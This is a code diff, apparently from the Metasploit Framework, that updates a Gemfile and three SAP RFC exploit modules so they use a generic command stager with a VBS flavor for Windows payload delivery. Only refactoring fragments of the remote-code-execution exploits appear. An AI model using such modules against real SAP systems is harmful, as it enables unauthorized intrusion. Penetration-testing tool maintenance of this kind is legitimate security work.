Update Cmdstager

Author: Meatballs1

Gemfile

@@ -6,6 +6,8 @@ gem 'activesupport', '>= 3.0.0', '< 4.0.0'
 gem 'bcrypt'
 # Needed for some admin modules (scrutinizer_add_user.rb)
 gem 'json'
+# Needed for Meterpreter on Windows, soon others.
+gem 'meterpreter_bins', '0.0.6'
 # Needed by msfgui and other rpc components
 gem 'msgpack'
 # Needed by anemone crawler
@@ -23,7 +25,7 @@ group :db do
   # Needed for Msf::DbManager
   gem 'activerecord', '>= 3.0.0', '< 4.0.0'
   # Database models shared between framework and Pro.
-  gem 'metasploit_data_models', '~> 0.17.0'
+  gem 'metasploit_data_models', '0.17.0'
   # Needed for module caching in Mdm::ModuleDetails
   gem 'pg', '>= 0.11'
 end
@@ -69,5 +71,5 @@ group :test do
 end
 
 group :sap do
-  gem 'nwrfc', :git => 'https://github.com/Meatballs1/nwrfc.git', :branch => 'unblock'
+  gem 'nwrfc', '>= 0.0.6'
 end

modules/exploits/multi/sap/sap_rfc_abap_install_and_run.rb

@@ -27,7 +27,7 @@ class Metasploit4 < Msf::Exploit::Remote
 
   Rank = GreatRanking
 
-  include Msf::Exploit::CmdStagerVBS
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::SAP::RFC
 
   def initialize
@@ -83,14 +83,16 @@ def initialize
       [
         OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments', '255']),
       ], self.class)
+
+    deregister_options('CMDSTAGER::FLAVOR')
   end
 
   def exploit
     if target.name =~ /Windows/
       linemax = datastore['PAYLOAD_SPLIT']
       vprint_status("#{datastore['rhost']}:#{datastore['rport']} [SAP] - Using custom payload size of #{linemax}") if linemax != 255
       print_status("#{datastore['rhost']}:#{datastore['rport']} [SAP] - Sending RFC request")
-      execute_cmdstager({ :delay => 0, :linemax => linemax })
+      execute_cmdstager({ :flavor => :vbs, :delay => 0, :linemax => linemax })
     elsif target.name =~ /Linux/
       print_status("#{datastore['rhost']}:#{datastore['rport']} [SAP] - Executing payload...")
       send_payload("#{payload.encoded} &")

modules/exploits/multi/sap/sap_rfc_sxpg_call_system.rb

@@ -27,7 +27,7 @@ class Metasploit4 < Msf::Exploit::Remote
 
   Rank = GreatRanking
 
-  include Msf::Exploit::CmdStagerVBS
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::SAP::RFC
 
   def initialize
@@ -88,6 +88,8 @@ def initialize
       [
         OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments', '120']),
       ], self.class)
+
+    deregister_options('CMDSTAGER::FLAVOR')
   end
 
   def exploit
@@ -96,7 +98,7 @@ def exploit
       linemax = datastore['PAYLOAD_SPLIT']
       vprint_status("#{datastore['RHOST']}:#{datastore['RPORT']} [SAP] Using custom payload size of #{linemax}") if linemax != 120
       print_status("#{datastore['RHOST']}:#{datastore['RPORT']} [SAP] Sending RFC request")
-      execute_cmdstager({ :delay => 0, :linemax => linemax })
+      execute_cmdstager({ :flavor => :vbs, :delay => 0, :linemax => linemax })
     when /Linux/
       opts = {
         :rhost => rhost,

modules/exploits/multi/sap/sap_rfc_sxpg_command_exec.rb

@@ -27,7 +27,7 @@ class Metasploit4 < Msf::Exploit::Remote
 
   Rank = GreatRanking
 
-  include Msf::Exploit::CmdStagerVBS
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::SAP::RFC
 
   def initialize
@@ -88,6 +88,8 @@ def initialize
       [
         OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments', '248']),
       ], self.class)
+
+    deregister_options('CMDSTAGER::FLAVOR')
   end
 
   def exploit
@@ -97,7 +99,7 @@ def exploit
       linemax = datastore['PAYLOAD_SPLIT']
       vprint_status("#{datastore['RHOST']}:#{datastore['RPORT']} [SAP] Using custom payload size of #{linemax}") if linemax != 248
       print_status("#{datastore['RHOST']}:#{datastore['RPORT']} [SAP] Sending RFC request")
-      execute_cmdstager({ :delay => 0, :linemax => linemax })
+      execute_cmdstager({ :flavor => :vbs, :delay => 0, :linemax => linemax })
     when /Linux/
       opts = {
         :rhost => rhost,